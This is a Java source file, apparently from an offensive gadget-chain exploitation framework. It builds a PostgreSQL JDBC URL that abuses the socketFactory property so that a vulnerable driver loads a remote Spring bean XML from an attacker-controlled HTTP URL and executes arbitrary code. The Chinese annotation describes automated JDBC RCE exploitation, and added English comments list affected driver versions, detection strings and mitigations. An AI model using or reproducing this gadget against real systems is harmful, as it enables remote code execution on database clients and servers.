package com.ar3h.chains.gadget.impl.common.jdbc;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import java.util.Iterator;
import java.util.Map;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

/**
 * Builds a PostgreSQL JDBC connection string whose {@code socketFactory} property names
 * Spring's {@code ClassPathXmlApplicationContext} and whose {@code socketFactoryArg} is an
 * HTTP URL taken from the gadget context.
 *
 * <p>English summary of the annotation text below: the gadget is meant only for the JNDI
 * module, targets the "JDBC URL under attacker control" scenario, and relies on a Spring bean
 * XML file that the JNDI module generates and caches.
 *
 * <p>Notes for reviewers and defenders, derived from what this class emits:
 * <ul>
 *   <li>Affected driver ranges, as listed in {@code dependencies}:
 *       {@code 9.4.1208 <= version < 42.2.25} and {@code 42.3.0 <= version < 42.3.2}.
 *       Drivers at or above the upper bounds are outside the listed ranges.</li>
 *   <li>Detection: a JDBC URL that carries {@code socketFactory=} pointing at a Spring
 *       application-context class together with {@code socketFactoryArg=http...} is not a
 *       normal driver configuration; it is a useful string to match in request logs,
 *       data-source configuration audits and outbound HTTP telemetry from database clients.</li>
 *   <li>Mitigation: do not let untrusted input reach the JDBC URL or connection properties,
 *       allow-list the properties an application may set, keep the driver patched, and
 *       restrict outbound HTTP from hosts that open database connections.</li>
 * </ul>
 */
@GadgetAnnotation(name = "PostgreSQL JDBC 仅适用于JNDI模块", alias = "pgsql", description = "注意，本Gadget只适用于在JNDI Exploit 模块中使用\n适用于jdbc rce场景，通过 ClassPathXmlApplicationContext 加载本地xml，实现执行任意字节码\n该 JNDI 版会自动生成spring bean xml文件并缓存到 JNDI Exploit 中，实现自动化利用", dependencies = {"org.postgresql:postgresql:org.postgresql.Driver", "9.4.1208 <= org.postgresql:postgresql <42.2.25", "42.3.0 <= org.postgresql:postgresql < 42.3.2"}, priority = 40)
@GadgetTags(tags = {Tag.PostgreSQLJdbcUrl, Tag.JdbcUrlChains}, nextTags = {"SpringBeanXmlExec", "SpringBeanXmlSpEL", "SpringBeanXmlClassLoader"})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/jdbc/PostgreSqlJdbc4Jndi.class */
public class PostgreSqlJdbc4Jndi implements Gadget {
    private static final Logger log = LoggerFactory.getLogger(PostgreSqlJdbc4Jndi.class);

    // Driver class name published to the context by invoke().
    public String driverClassName = "org.postgresql.Driver";

    // Context of the current invocation; assigned in invoke() before getObject() runs.
    GadgetContext context;

    /**
     * Assembles the JDBC URL from values already present in the context.
     *
     * <p>The XML location is the context value {@code JNDI_HTTP_URL} followed by the first key
     * of the {@code CACHE_FILES_MAP} entry set; when that map is missing or empty, nothing is
     * appended. The resulting location is stored under {@code "xmlHttpUrl"} and logged at
     * INFO level.
     *
     * @return the JDBC URL string with the XML location as {@code socketFactoryArg}
     */
    public String getObject() {
        Object cachedFiles = this.context.get(ContextTag.CACHE_FILES_MAP);
        String cachedPath = "";
        if (cachedFiles != null) {
            // Only the first entry is consulted; any further cached files are ignored.
            for (Map.Entry<?, ?> entry : ((Map<?, ?>) cachedFiles).entrySet()) {
                cachedPath = (String) entry.getKey();
                break;
            }
        }

        // Plain string concatenation: a missing JNDI_HTTP_URL is rendered as the text "null".
        String xmlUrl = this.context.get(ContextTag.JNDI_HTTP_URL) + cachedPath;
        this.context.put("xmlHttpUrl", xmlUrl);
        log.info("postgresql bean.xml jndi http url: {}", xmlUrl);

        // Host, port and database are fixed placeholders; the socketFactory/socketFactoryArg
        // pair is the part worth matching on in logs and configuration reviews.
        return "jdbc:postgresql://127.0.0.1:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=" + xmlUrl;
    }

    /**
     * Runs the rest of the chain, then produces the JDBC URL and records the driver class.
     *
     * @param gadgetContext context shared by the chain; kept on this instance for getObject()
     * @param gadgetChain   chain whose {@code doCreate} is called before the URL is built
     * @return the JDBC URL string produced by {@link #getObject()}
     * @throws Exception declared by the {@code Gadget} contract; propagated from the chain
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        this.context = gadgetContext;
        // The downstream gadgets run first, before this class reads the context values.
        gadgetChain.doCreate(gadgetContext);
        String jdbcUrl = getObject();
        gadgetContext.put(ContextTag.DRIVER_CLASS_NAME_KEY, this.driverClassName);
        return jdbcUrl;
    }
}
